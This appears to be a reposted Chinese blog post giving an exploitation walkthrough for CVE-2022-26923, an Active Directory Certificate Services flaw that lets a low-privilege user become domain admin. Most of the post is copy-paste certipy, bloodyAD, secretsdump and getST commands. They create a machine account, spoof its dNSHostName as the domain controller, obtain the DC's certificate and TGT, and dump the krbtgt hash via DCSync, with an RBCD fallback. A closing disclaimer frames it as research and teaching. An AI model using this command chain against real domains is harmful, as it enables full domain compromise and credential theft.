该漏洞允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中将权限提升到域管理员。在默认安装的ADCS里就启用了Machine模板。
添加机器账户,并将该机器账户dnsHostName指向DC[MAQ默认为10]:
1certipy account create -u [email protected] -p 321.com -dc-ip 192.168.11.11 -user hacker -pass win@123456 -dns 'dc.attack.cn'
用该机器账户向ADCS请求证书:
1# TARGET为ADCS机器IP
2certipy req -u 'hacker$'@attack.cn -p win@123456 -target 192.168.11.12 -ca ATTACK-ADCS-CA -template Machine
用申请的证书请求DC$的TGT:
1certipy auth -pfx dc.pfx -dc-ip 192.168.11.11
用DC$的nthash去DCSync:
1secretsdump.py attack.cn/'dc$'@192.168.11.11 -just-dc-user attack/krbtgt -hashes :8ddb967e3951a2601d76e489373bbd0e
使用bloodyAD 攻击
1# 查询MAQ的属性
2python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' ms-DS-MachineAccountQuota
3
4 python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' ms-DS-MachineAccountQuota
5
6# 新增计算机账号
7python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 addComputer creme pass123
8
9# 设置新增的机器账号的属性DNSHostName指向AD的属性值
10python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 setAttribute 'CN=cremem,CN=Computers,DC=attack,DC=cn' dNSHostName '["dc.attack.cn"]'
11# 查看dNSHostName属性的指向
12
13python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' dNSHostName
14# 运行Certipy生成机器证书,可以看到DNSHostName 已经变成了dc.attack.cn
15certipy req 'attack.cn/cremem$:[email protected]' -ca ATTACK-ADCS-CA -template Machine
16# 用申请的证书请求DC$的TGT
17certipy auth -pfx dc.pfx -dc-ip 192.168.11.11
18# 用DC$的nthash去DCSync
19secretsdump.py attack.cn/'dc$'@192.168.11.11 -just-dc-user attack/krbtgt -hashes :8ddb967e3951a2601d76e489373bbd0e如果使用certipy请求TGT失败,还可以设置RBCD来攻击:
1openssl pkcs12 -in dc.pfx -out dc.pem -nodes
2python3 bloodyAD.py -c ':dc.pem' -u 'win$' --host 192.168.11.11 setRbcd 'hacker$' 'dc$'
3getST.py attack.cn/'hacker$':'win@123456' -spn LDAP/dc.attack.cn -impersonate administrator -dc-ip 192.168.11.11
4export KRB5CCNAME=administrator.ccache
5secretsdump.py -k dc.attack.cn -just-dc-user attack/krbtgt
版权声明:著作权归作者所有。如有侵权请联系删除
原文始发于微信公众号(开源聚合网络空间安全研究院):【Windows域提权漏洞 】ADCS攻击之CVE-2022–26923
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论